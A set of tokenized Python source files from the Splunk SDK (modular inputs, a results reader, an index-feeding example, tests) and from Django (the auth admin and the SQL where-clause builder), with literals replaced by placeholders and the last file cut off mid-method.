<s> from abc import ABCMeta , abstractmethod <EOL> from urlparse import urlsplit <EOL> import sys <EOL> from splunklib . client import Service <EOL> from splunklib . modularinput . event_writer import EventWriter <EOL> from splunklib . modularinput . input_definition import InputDefinition <EOL> from splunklib . modularinput . validation_definition import ValidationDefinition <EOL> try : <EOL> import xml . etree . cElementTree as ET <EOL> except ImportError : <EOL> import xml . etree . ElementTree as ET <EOL> class Script ( object ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = ABCMeta <EOL> def __init__ ( self ) : <EOL> self . _input_definition = None <EOL> self . _service = None <EOL> def run ( self , args ) : <EOL> """<STR_LIT>""" <EOL> return self . run_script ( args , EventWriter ( ) , sys . stdin ) <EOL> def run_script ( self , args , event_writer , input_stream ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if len ( args ) == <NUM_LIT:1> : <EOL> self . _input_definition = InputDefinition . parse ( input_stream ) <EOL> self . stream_events ( self . _input_definition , event_writer ) <EOL> event_writer . close ( ) <EOL> return <NUM_LIT:0> <EOL> elif str ( args [ <NUM_LIT:1> ] ) . lower ( ) == "<STR_LIT>" : <EOL> scheme = self . get_scheme ( ) <EOL> if scheme is None : <EOL> event_writer . log ( <EOL> EventWriter . FATAL , <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:1> <EOL> else : <EOL> event_writer . write_xml_document ( scheme . to_xml ( ) ) <EOL> return <NUM_LIT:0> <EOL> elif args [ <NUM_LIT:1> ] . lower ( ) == "<STR_LIT>" : <EOL> validation_definition = ValidationDefinition . parse ( input_stream ) <EOL> try : <EOL> self . validate_input ( validation_definition ) <EOL> return <NUM_LIT:0> <EOL> except Exception as e : <EOL> root = ET . Element ( "<STR_LIT:error>" ) <EOL> ET . SubElement ( root , "<STR_LIT:message>" ) . text = e . message <EOL> event_writer . write_xml_document ( root ) <EOL> return <NUM_LIT:1> <EOL> else : <EOL> err_string = "<STR_LIT>" + '<STR_LIT:U+0020>' . join ( args ) <EOL> event_writer . _err . write ( err_string ) <EOL> except Exception as e : <EOL> err_string = EventWriter . ERROR + e . message <EOL> event_writer . _err . write ( err_string ) <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def service ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _service is not None : <EOL> return self . _service <EOL> if self . _input_definition is None : <EOL> return None <EOL> splunkd_uri = self . _input_definition . metadata [ "<STR_LIT>" ] <EOL> session_key = self . _input_definition . metadata [ "<STR_LIT>" ] <EOL> scheme , netloc , _ , _ , _ = urlsplit ( splunkd_uri , allow_fragments = False ) <EOL> splunkd_host , splunkd_port = netloc . split ( '<STR_LIT::>' ) <EOL> self . _service = Service ( <EOL> scheme = scheme , host = splunkd_host , port = splunkd_port , <EOL> token = session_key ) <EOL> return self . _service <EOL> @ abstractmethod <EOL> def get_scheme ( self ) : <EOL> """<STR_LIT>""" <EOL> def validate_input ( self , definition ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ abstractmethod <EOL> def stream_events ( self , inputs , ew ) : <EOL> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> import xml . etree . cElementTree as et <EOL> except : <EOL> import xml . etree . ElementTree as et <EOL> try : <EOL> from collections import OrderedDict <EOL> except : <EOL> from ordereddict import OrderedDict <EOL> try : <EOL> from cStringIO import StringIO <EOL> except : <EOL> from StringIO import StringIO <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> class Message ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type_ , message ) : <EOL> self . type = type_ <EOL> self . message = message <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . type , self . message ) <EOL> def __eq__ ( self , other ) : <EOL> return ( self . type , self . message ) == ( other . type , other . message ) <EOL> def __hash__ ( self ) : <EOL> return hash ( ( self . type , self . message ) ) <EOL> class _ConcatenatedStream ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * streams ) : <EOL> self . streams = list ( streams ) <EOL> def read ( self , n = None ) : <EOL> """<STR_LIT>""" <EOL> response = "<STR_LIT>" <EOL> while len ( self . streams ) > <NUM_LIT:0> and ( n is None or n > <NUM_LIT:0> ) : <EOL> txt = self . streams [ <NUM_LIT:0> ] . read ( n ) <EOL> response += txt <EOL> if n is not None : <EOL> n -= len ( txt ) <EOL> if n > <NUM_LIT:0> or n is None : <EOL> del self . streams [ <NUM_LIT:0> ] <EOL> return response <EOL> class _XMLDTDFilter ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , stream ) : <EOL> self . stream = stream <EOL> def read ( self , n = None ) : <EOL> """<STR_LIT>""" <EOL> response = "<STR_LIT>" <EOL> while n is None or n > <NUM_LIT:0> : <EOL> c = self . stream . read ( <NUM_LIT:1> ) <EOL> if c == "<STR_LIT>" : <EOL> break <EOL> elif c == "<STR_LIT:<>" : <EOL> c += self . stream . read ( <NUM_LIT:1> ) <EOL> if c == "<STR_LIT>" : <EOL> while True : <EOL> q = self . stream . read ( <NUM_LIT:1> ) <EOL> if q == "<STR_LIT:>>" : <EOL> break <EOL> else : <EOL> response += c <EOL> if n is not None : <EOL> n -= len ( c ) <EOL> else : <EOL> response += c <EOL> if n is not None : <EOL> n -= <NUM_LIT:1> <EOL> return response <EOL> class ResultsReader ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , stream ) : <EOL> stream = _XMLDTDFilter ( stream ) <EOL> stream = _ConcatenatedStream ( StringIO ( "<STR_LIT>" ) , stream , StringIO ( "<STR_LIT>" ) ) <EOL> self . is_preview = None <EOL> self . _gen = self . _parse_results ( stream ) <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> return self . _gen . next ( ) <EOL> def _parse_results ( self , stream ) : <EOL> """<STR_LIT>""" <EOL> result = None <EOL> values = None <EOL> try : <EOL> for event , elem in et . iterparse ( stream , events = ( '<STR_LIT:start>' , '<STR_LIT:end>' ) ) : <EOL> if elem . tag == '<STR_LIT>' and event == '<STR_LIT:start>' : <EOL> is_preview = elem . attrib [ '<STR_LIT>' ] == '<STR_LIT:1>' <EOL> self . is_preview = is_preview <EOL> if elem . tag == '<STR_LIT:result>' : <EOL> if event == '<STR_LIT:start>' : <EOL> result = OrderedDict ( ) <EOL> elif event == '<STR_LIT:end>' : <EOL> yield result <EOL> result = None <EOL> elem . clear ( ) <EOL> elif elem . tag == '<STR_LIT>' and result is not None : <EOL> if event == '<STR_LIT:start>' : <EOL> values = [ ] <EOL> elif event == '<STR_LIT:end>' : <EOL> field_name = elem . attrib [ '<STR_LIT:k>' ] . encode ( '<STR_LIT:utf8>' ) <EOL> if len ( values ) == <NUM_LIT:1> : <EOL> result [ field_name ] = values [ <NUM_LIT:0> ] <EOL> else : <EOL> result [ field_name ] = values <EOL> elem . clear ( ) <EOL> elif elem . tag in ( '<STR_LIT:text>' , '<STR_LIT:v>' ) and event == '<STR_LIT:end>' : <EOL> values . append ( elem . text . encode ( '<STR_LIT:utf8>' ) ) <EOL> elem . clear ( ) <EOL> elif elem . tag == '<STR_LIT>' : <EOL> if event == '<STR_LIT:start>' : <EOL> msg_type = elem . attrib [ '<STR_LIT:type>' ] <EOL> elif event == '<STR_LIT:end>' : <EOL> yield Message ( msg_type , elem . text . encode ( '<STR_LIT:utf8>' ) ) <EOL> elem . clear ( ) <EOL> except et . ParseError as pe : <EOL> if '<STR_LIT>' in pe . msg : <EOL> return <EOL> else : <EOL> raise </s>
<s> """<STR_LIT>""" <EOL> import socket <EOL> import sys , os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT:..>" ) ) <EOL> import time <EOL> import datetime <EOL> from splunklib . client import connect <EOL> try : <EOL> from utils import parse <EOL> except ImportError : <EOL> raise Exception ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> SPLUNK_HOST = "<STR_LIT:localhost>" <EOL> SPLUNK_PORT = <NUM_LIT> <EOL> INGEST_TYPE = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> RULES = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ "<STR_LIT>" ] , <EOL> '<STR_LIT:default>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : "<STR_LIT>" % INGEST_TYPE <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ "<STR_LIT>" ] , <EOL> '<STR_LIT:default>' : "<STR_LIT:127.0.0.1>" , <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } , <EOL> '<STR_LIT:type>' : { <EOL> '<STR_LIT>' : [ "<STR_LIT>" ] , <EOL> '<STR_LIT:default>' : SPLUNK_PORT , <EOL> '<STR_LIT>' : "<STR_LIT>" % SPLUNK_PORT <EOL> } , <EOL> } <EOL> def feed_index ( service , opts ) : <EOL> """<STR_LIT>""" <EOL> indexname = opts . args [ <NUM_LIT:0> ] <EOL> itype = opts . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> index = service . indexes [ indexname ] <EOL> except KeyError : <EOL> print "<STR_LIT>" % indexname <EOL> return <EOL> if itype in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> stream = index . attach ( ) <EOL> else : <EOL> input_host = opts . kwargs . get ( "<STR_LIT>" , SPLUNK_HOST ) <EOL> input_port = int ( opts . kwargs . get ( "<STR_LIT>" , SPLUNK_PORT ) ) <EOL> input_name = "<STR_LIT>" % ( input_port ) <EOL> if input_name not in service . inputs . list ( ) : <EOL> service . inputs . create ( "<STR_LIT>" , input_port , index = indexname ) <EOL> ingest = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> ingest . connect ( ( input_host , input_port ) ) <EOL> count = <NUM_LIT:0> <EOL> lastevent = "<STR_LIT>" <EOL> try : <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:10> ) : <EOL> for j in range ( <NUM_LIT:0> , <NUM_LIT> ) : <EOL> lastevent = "<STR_LIT>" % ( datetime . datetime . now ( ) . isoformat ( ) , i , j ) <EOL> if itype == "<STR_LIT>" : <EOL> stream . write ( lastevent + "<STR_LIT:\n>" ) <EOL> elif itype == "<STR_LIT>" : <EOL> index . submit ( lastevent + "<STR_LIT:\n>" ) <EOL> else : <EOL> ingest . send ( lastevent + "<STR_LIT:\n>" ) <EOL> count = count + <NUM_LIT:1> <EOL> print "<STR_LIT>" % count <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> except KeyboardInterrupt : <EOL> print "<STR_LIT>" <EOL> print lastevent <EOL> def main ( ) : <EOL> usage = "<STR_LIT>" <EOL> argv = sys . argv [ <NUM_LIT:1> : ] <EOL> if len ( argv ) == <NUM_LIT:0> : <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> opts = parse ( argv , RULES , "<STR_LIT>" , usage = usage ) <EOL> service = connect ( ** opts . kwargs ) <EOL> if opts . kwargs [ '<STR_LIT>' ] not in INGEST_TYPE : <EOL> print "<STR_LIT>" % INGEST_TYPE <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> feed_index ( service , opts ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from __future__ import absolute_import , division , print_function , unicode_literals <EOL> from itertools import imap <EOL> from . decorators import ConfigurationSetting <EOL> from . search_command import SearchCommand <EOL> class EventingCommand ( SearchCommand ) : <EOL> """<STR_LIT>""" <EOL> def transform ( self , records ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def _execute ( self , ifile , process ) : <EOL> SearchCommand . _execute ( self , ifile , self . transform ) <EOL> class ConfigurationSettings ( SearchCommand . ConfigurationSettings ) : <EOL> """<STR_LIT>""" <EOL> required_fields = ConfigurationSetting ( doc = '''<STR_LIT>''' ) <EOL> clear_required_fields = ConfigurationSetting ( doc = '''<STR_LIT>''' ) <EOL> retainsevents = ConfigurationSetting ( readonly = True , value = True , doc = '''<STR_LIT>''' ) <EOL> maxinputs = ConfigurationSetting ( doc = '''<STR_LIT>''' ) <EOL> type = ConfigurationSetting ( readonly = True , value = '<STR_LIT>' , doc = '''<STR_LIT>''' ) <EOL> @ classmethod <EOL> def fix_up ( cls , command ) : <EOL> """<STR_LIT>""" <EOL> if command . transform == EventingCommand . transform : <EOL> raise AttributeError ( '<STR_LIT>' ) <EOL> SearchCommand . ConfigurationSettings . fix_up ( command ) <EOL> def iteritems ( self ) : <EOL> iteritems = SearchCommand . ConfigurationSettings . iteritems ( self ) <EOL> return imap ( lambda ( name , value ) : ( name , '<STR_LIT>' if name == '<STR_LIT:type>' else value ) , iteritems ) </s>
<s> import testlib <EOL> import logging <EOL> import splunklib . client as client <EOL> class TestRead ( testlib . SDKTestCase ) : <EOL> def test_read ( self ) : <EOL> service = client . connect ( ** self . opts . kwargs ) <EOL> confs = service . confs <EOL> self . assertTrue ( '<STR_LIT>' in confs ) <EOL> self . assertTrue ( '<STR_LIT>' in confs ) <EOL> self . assertTrue ( '<STR_LIT>' in confs ) <EOL> self . assertTrue ( '<STR_LIT>' in confs ) <EOL> self . assertTrue ( '<STR_LIT>' in confs ) <EOL> self . assertTrue ( '<STR_LIT>' in confs ) <EOL> for stanza in confs [ '<STR_LIT>' ] . list ( count = <NUM_LIT:5> ) : <EOL> self . check_entity ( stanza ) <EOL> class TestConfs ( testlib . SDKTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestConfs , self ) . setUp ( ) <EOL> self . app_name = testlib . tmpname ( ) <EOL> self . app = self . service . apps . create ( self . app_name ) <EOL> kwargs = self . opts . kwargs . copy ( ) <EOL> kwargs [ '<STR_LIT>' ] = self . app_name <EOL> kwargs [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> kwargs [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> self . app_service = client . connect ( ** kwargs ) <EOL> def tearDown ( self ) : <EOL> self . service . apps . delete ( self . app_name ) <EOL> self . clear_restart_message ( ) <EOL> def test_confs ( self ) : <EOL> confs = self . app_service . confs <EOL> conf_name = testlib . tmpname ( ) <EOL> self . assertRaises ( KeyError , confs . __getitem__ , conf_name ) <EOL> self . assertFalse ( conf_name in confs ) <EOL> conf = confs . create ( conf_name ) <EOL> self . assertTrue ( conf_name in confs ) <EOL> self . assertEqual ( conf . name , conf_name ) <EOL> stanzas = conf . list ( ) <EOL> self . assertEqual ( len ( stanzas ) , <NUM_LIT:0> ) <EOL> count = len ( conf ) <EOL> stanza_name = testlib . tmpname ( ) <EOL> stanza = conf . create ( stanza_name ) <EOL> self . assertEqual ( len ( conf ) , count + <NUM_LIT:1> ) <EOL> self . assertTrue ( stanza_name in conf ) <EOL> self . assertEqual ( len ( stanza ) , <NUM_LIT:0> ) <EOL> key = testlib . tmpname ( ) <EOL> val = testlib . tmpname ( ) <EOL> stanza . update ( ** { key : val } ) <EOL> self . assertEventuallyTrue ( lambda : stanza . refresh ( ) and len ( stanza ) == <NUM_LIT:1> , pause_time = <NUM_LIT> ) <EOL> self . assertEqual ( len ( stanza ) , <NUM_LIT:1> ) <EOL> self . assertTrue ( key in stanza ) <EOL> values = { testlib . tmpname ( ) : testlib . tmpname ( ) , <EOL> testlib . tmpname ( ) : testlib . tmpname ( ) } <EOL> stanza . submit ( values ) <EOL> stanza . refresh ( ) <EOL> for key , value in values . iteritems ( ) : <EOL> self . assertTrue ( key in stanza ) <EOL> self . assertEqual ( value , stanza [ key ] ) <EOL> count = len ( conf ) <EOL> conf . delete ( stanza_name ) <EOL> self . assertFalse ( stanza_name in conf ) <EOL> self . assertEqual ( len ( conf ) , count - <NUM_LIT:1> ) <EOL> self . assertRaises ( client . IllegalOperationException , confs . delete , conf_name ) <EOL> self . assertTrue ( conf_name in confs ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> try : <EOL> import unittest2 as unittest <EOL> except ImportError : <EOL> import unittest <EOL> unittest . main ( ) </s>
<s> from django . db import transaction <EOL> from django . conf import settings <EOL> from django . contrib import admin <EOL> from django . contrib . auth . forms import ( UserCreationForm , UserChangeForm , <EOL> AdminPasswordChangeForm ) <EOL> from django . contrib . auth . models import User , Group <EOL> from django . contrib import messages <EOL> from django . core . exceptions import PermissionDenied <EOL> from django . http import HttpResponseRedirect , Http404 <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . template . response import TemplateResponse <EOL> from django . utils . html import escape <EOL> from django . utils . decorators import method_decorator <EOL> from django . utils . translation import ugettext , ugettext_lazy as _ <EOL> from django . views . decorators . csrf import csrf_protect <EOL> from django . views . decorators . debug import sensitive_post_parameters <EOL> csrf_protect_m = method_decorator ( csrf_protect ) <EOL> sensitive_post_parameters_m = method_decorator ( sensitive_post_parameters ( ) ) <EOL> class GroupAdmin ( admin . ModelAdmin ) : <EOL> search_fields = ( '<STR_LIT:name>' , ) <EOL> ordering = ( '<STR_LIT:name>' , ) <EOL> filter_horizontal = ( '<STR_LIT>' , ) <EOL> def formfield_for_manytomany ( self , db_field , request = None , ** kwargs ) : <EOL> if db_field . name == '<STR_LIT>' : <EOL> qs = kwargs . get ( '<STR_LIT>' , db_field . rel . to . objects ) <EOL> kwargs [ '<STR_LIT>' ] = qs . select_related ( '<STR_LIT>' ) <EOL> return super ( GroupAdmin , self ) . formfield_for_manytomany ( <EOL> db_field , request = request , ** kwargs ) <EOL> class UserAdmin ( admin . ModelAdmin ) : <EOL> add_form_template = '<STR_LIT>' <EOL> change_user_password_template = None <EOL> fieldsets = ( <EOL> ( None , { '<STR_LIT>' : ( '<STR_LIT:username>' , '<STR_LIT:password>' ) } ) , <EOL> ( _ ( '<STR_LIT>' ) , { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:email>' ) } ) , <EOL> ( _ ( '<STR_LIT>' ) , { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) } ) , <EOL> ( _ ( '<STR_LIT>' ) , { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) } ) , <EOL> ) <EOL> add_fieldsets = ( <EOL> ( None , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:username>' , '<STR_LIT>' , '<STR_LIT>' ) } <EOL> ) , <EOL> ) <EOL> form = UserChangeForm <EOL> add_form = UserCreationForm <EOL> change_password_form = AdminPasswordChangeForm <EOL> list_display = ( '<STR_LIT:username>' , '<STR_LIT:email>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> list_filter = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> search_fields = ( '<STR_LIT:username>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:email>' ) <EOL> ordering = ( '<STR_LIT:username>' , ) <EOL> filter_horizontal = ( '<STR_LIT>' , '<STR_LIT>' , ) <EOL> def get_fieldsets ( self , request , obj = None ) : <EOL> if not obj : <EOL> return self . add_fieldsets <EOL> return super ( UserAdmin , self ) . get_fieldsets ( request , obj ) <EOL> def get_form ( self , request , obj = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> defaults = { } <EOL> if obj is None : <EOL> defaults . update ( { <EOL> '<STR_LIT>' : self . add_form , <EOL> '<STR_LIT>' : admin . util . flatten_fieldsets ( self . add_fieldsets ) , <EOL> } ) <EOL> defaults . update ( kwargs ) <EOL> return super ( UserAdmin , self ) . get_form ( request , obj , ** defaults ) <EOL> def get_urls ( self ) : <EOL> from django . conf . urls import patterns <EOL> return patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , <EOL> self . admin_site . admin_view ( self . user_change_password ) ) <EOL> ) + super ( UserAdmin , self ) . get_urls ( ) <EOL> def lookup_allowed ( self , lookup , value ) : <EOL> if lookup . startswith ( '<STR_LIT:password>' ) : <EOL> return False <EOL> return super ( UserAdmin , self ) . lookup_allowed ( lookup , value ) <EOL> @ sensitive_post_parameters_m <EOL> @ csrf_protect_m <EOL> @ transaction . commit_on_success <EOL> def add_view ( self , request , form_url = '<STR_LIT>' , extra_context = None ) : <EOL> if not self . has_change_permission ( request ) : <EOL> if self . has_add_permission ( request ) and settings . DEBUG : <EOL> raise Http404 ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> raise PermissionDenied <EOL> if extra_context is None : <EOL> extra_context = { } <EOL> username_field = self . model . _meta . get_field ( self . model . USERNAME_FIELD ) <EOL> defaults = { <EOL> '<STR_LIT>' : ( ) , <EOL> '<STR_LIT>' : username_field . help_text , <EOL> } <EOL> extra_context . update ( defaults ) <EOL> return super ( UserAdmin , self ) . add_view ( request , form_url , <EOL> extra_context ) <EOL> @ sensitive_post_parameters_m <EOL> def user_change_password ( self , request , id , form_url = '<STR_LIT>' ) : <EOL> if not self . has_change_permission ( request ) : <EOL> raise PermissionDenied <EOL> user = get_object_or_404 ( self . queryset ( request ) , pk = id ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> form = self . change_password_form ( user , request . POST ) <EOL> if form . is_valid ( ) : <EOL> form . save ( ) <EOL> msg = ugettext ( '<STR_LIT>' ) <EOL> messages . success ( request , msg ) <EOL> return HttpResponseRedirect ( '<STR_LIT:..>' ) <EOL> else : <EOL> form = self . change_password_form ( user ) <EOL> fieldsets = [ ( None , { '<STR_LIT>' : list ( form . base_fields ) } ) ] <EOL> adminForm = admin . helpers . AdminForm ( form , fieldsets , { } ) <EOL> context = { <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) % escape ( user . get_username ( ) ) , <EOL> '<STR_LIT>' : adminForm , <EOL> '<STR_LIT>' : form_url , <EOL> '<STR_LIT>' : form , <EOL> '<STR_LIT>' : '<STR_LIT>' in request . REQUEST , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : self . model . _meta , <EOL> '<STR_LIT>' : user , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> return TemplateResponse ( request , <EOL> self . change_user_password_template or <EOL> '<STR_LIT>' , <EOL> context , current_app = self . admin_site . name ) <EOL> def response_add ( self , request , obj , post_url_continue = None ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' not in request . POST and '<STR_LIT>' not in request . POST : <EOL> request . POST [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> return super ( UserAdmin , self ) . response_add ( request , obj , <EOL> post_url_continue ) <EOL> admin . site . register ( Group , GroupAdmin ) <EOL> admin . site . register ( User , UserAdmin ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import datetime <EOL> from itertools import repeat <EOL> from django . utils import tree <EOL> from django . db . models . fields import Field <EOL> from django . db . models . sql . datastructures import EmptyResultSet <EOL> from django . db . models . sql . aggregates import Aggregate <EOL> from django . utils . itercompat import is_iterator <EOL> from django . utils . six . moves import xrange <EOL> AND = '<STR_LIT>' <EOL> OR = '<STR_LIT>' <EOL> class EmptyShortCircuit ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class WhereNode ( tree . Node ) : <EOL> """<STR_LIT>""" <EOL> default = AND <EOL> def add ( self , data , connector ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( data , ( list , tuple ) ) : <EOL> super ( WhereNode , self ) . add ( data , connector ) <EOL> return <EOL> obj , lookup_type , value = data <EOL> if is_iterator ( value ) : <EOL> value = list ( value ) <EOL> if isinstance ( value , datetime . datetime ) : <EOL> value_annotation = datetime . datetime <EOL> elif hasattr ( value , '<STR_LIT>' ) : <EOL> value_annotation = value . value_annotation <EOL> else : <EOL> value_annotation = bool ( value ) <EOL> if hasattr ( obj , "<STR_LIT>" ) : <EOL> value = obj . prepare ( lookup_type , value ) <EOL> super ( WhereNode , self ) . add ( <EOL> ( obj , lookup_type , value_annotation , value ) , connector ) <EOL> def as_sql ( self , qn , connection ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> result_params = [ ] <EOL> everything_childs , nothing_childs = <NUM_LIT:0> , <NUM_LIT:0> <EOL> non_empty_childs = len ( self . children ) <EOL> for child in self . children : <EOL> try : <EOL> if hasattr ( child , '<STR_LIT>' ) : <EOL> sql , params = child . as_sql ( qn = qn , connection = connection ) <EOL> else : <EOL> sql , params = self . make_atom ( child , qn , connection ) <EOL> except EmptyResultSet : <EOL> nothing_childs += <NUM_LIT:1> <EOL> else : <EOL> if sql : <EOL> result . append ( sql ) <EOL> result_params . extend ( params ) <EOL> else : <EOL> if sql is None : <EOL> non_empty_childs -= <NUM_LIT:1> <EOL> continue <EOL> everything_childs += <NUM_LIT:1> <EOL> if self . connector == AND : <EOL> full_needed , empty_needed = non_empty_childs , <NUM_LIT:1> <EOL> else : <EOL> full_needed , empty_needed = <NUM_LIT:1> , non_empty_childs <EOL> if empty_needed - nothing_childs <= <NUM_LIT:0> : <EOL> if self . negated : <EOL> return '<STR_LIT>' , [ ] <EOL> else : <EOL> raise EmptyResultSet <EOL> if full_needed - everything_childs <= <NUM_LIT:0> : <EOL> if self . negated : <EOL> raise EmptyResultSet <EOL> else : <EOL> return '<STR_LIT>' , [ ] <EOL> if non_empty_childs == <NUM_LIT:0> : <EOL> return None , [ ] <EOL> conn = '<STR_LIT>' % self . connector <EOL> sql_string = conn . join ( result ) <EOL> if sql_string : <EOL> if self . negated : <EOL> sql_string = '<STR_LIT>' % sql_string <EOL> elif len ( result ) > <NUM_LIT:1> : <EOL> sql_string = '<STR_LIT>' % sql_string <EOL> return sql_string , result_params <EOL> def make_atom ( self , child , qn , connection ) : <EOL> """<STR_LIT>""" <EOL> lvalue , lookup_type , value_annotation , params_or_value = child <EOL> if isinstance ( lvalue , Constraint ) : <EOL> try : <EOL> lvalue , params = lvalue . process ( lookup_type , params_or_value , connection ) <EOL> except EmptyShortCircuit : <EOL> raise EmptyResultSet <EOL> elif isinstance ( lvalue , Aggregate ) : <EOL> params = lvalue . field . get_db_prep_lookup ( lookup_type , params_or_value , connection ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if isinstance ( lvalue , tuple ) : <EOL> field_sql = self . sql_for_columns ( lvalue , qn , connection ) <EOL> else : <EOL> field_sql = lvalue . as_sql ( qn , connection ) <EOL> if value_annotation is datetime . datetime : <EOL> cast_sql = connection . ops . datetime_cast_sql ( ) <EOL> else : <EOL> cast_sql = '<STR_LIT:%s>' <EOL> if hasattr ( params , '<STR_LIT>' ) : <EOL> extra , params = params . as_sql ( qn , connection ) <EOL> cast_sql = '<STR_LIT>' <EOL> else : <EOL> extra = '<STR_LIT>' <EOL> if ( len ( params ) == <NUM_LIT:1> and params [ <NUM_LIT:0> ] == '<STR_LIT>' and lookup_type == '<STR_LIT>' <EOL> and connection . features . interprets_empty_strings_as_nulls ) : <EOL> lookup_type = '<STR_LIT>' <EOL> value_annotation = True <EOL> if lookup_type in connection . operators : <EOL> format = "<STR_LIT>" % ( connection . ops . lookup_cast ( lookup_type ) , ) <EOL> return ( format % ( field_sql , <EOL> connection . operators [ lookup_type ] % cast_sql , <EOL> extra ) , params ) <EOL> if lookup_type == '<STR_LIT>' : <EOL> if not value_annotation : <EOL> raise EmptyResultSet <EOL> if extra : <EOL> return ( '<STR_LIT>' % ( field_sql , extra ) , params ) <EOL> max_in_list_size = connection . ops . max_in_list_size ( ) <EOL> if max_in_list_size and len ( params ) > max_in_list_size : <EOL> in_clause_elements = [ '<STR_LIT:(>' ] <EOL> for offset in xrange ( <NUM_LIT:0> , len ( params ) , max_in_list_size ) : <EOL> if offset > <NUM_LIT:0> : <EOL> in_clause_elements . append ( '<STR_LIT>' ) <EOL> in_clause_elements . append ( '<STR_LIT>' % field_sql ) <EOL> group_size = min ( len ( params ) - offset , max_in_list_size ) <EOL> param_group = '<STR_LIT:U+002CU+0020>' . join ( repeat ( '<STR_LIT:%s>' , group_size ) ) <EOL> in_clause_elements . append ( param_group ) <EOL> in_clause_elements . append ( '<STR_LIT:)>' ) <EOL> in_clause_elements . append ( '<STR_LIT:)>' ) <EOL> return '<STR_LIT>' . join ( in_clause_elements ) , params <EOL> else : <EOL> return ( '<STR_LIT>' % ( field_sql , <EOL> '<STR_LIT:U+002CU+0020>' . join ( repeat ( '<STR_LIT:%s>' , len ( params ) ) ) ) , <EOL> params ) <EOL> elif lookup_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return ( '<STR_LIT>' % field_sql , params ) <EOL> elif lookup_type in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return ( '<STR_LIT>' % connection . ops . date_extract_sql ( lookup_type , field_sql ) , <EOL> params ) <EOL> elif lookup_type == '<STR_LIT>' : <EOL> return ( '<STR_LIT>' % ( field_sql , <EOL> ( not value_annotation and '<STR_LIT>' or '<STR_LIT>' ) ) , ( ) ) <EOL> elif lookup_type == '<STR_LIT>' : <EOL> return ( connection . ops . fulltext_search_sql ( field_sql ) , params ) <EOL> elif lookup_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return connection . ops . regex_lookup ( lookup_type ) % ( field_sql , cast_sql ) , params <EOL> raise TypeError ( '<STR_LIT>' % lookup_type ) <EOL> def sql_for_columns ( self , data , qn , connection ) : <EOL> """<STR_LIT>""" <EOL> table_alias , name , db_type = data <EOL> if table_alias : <EOL> lhs = '<STR_LIT>' % ( qn ( table_alias ) , qn ( name ) ) <EOL> else : 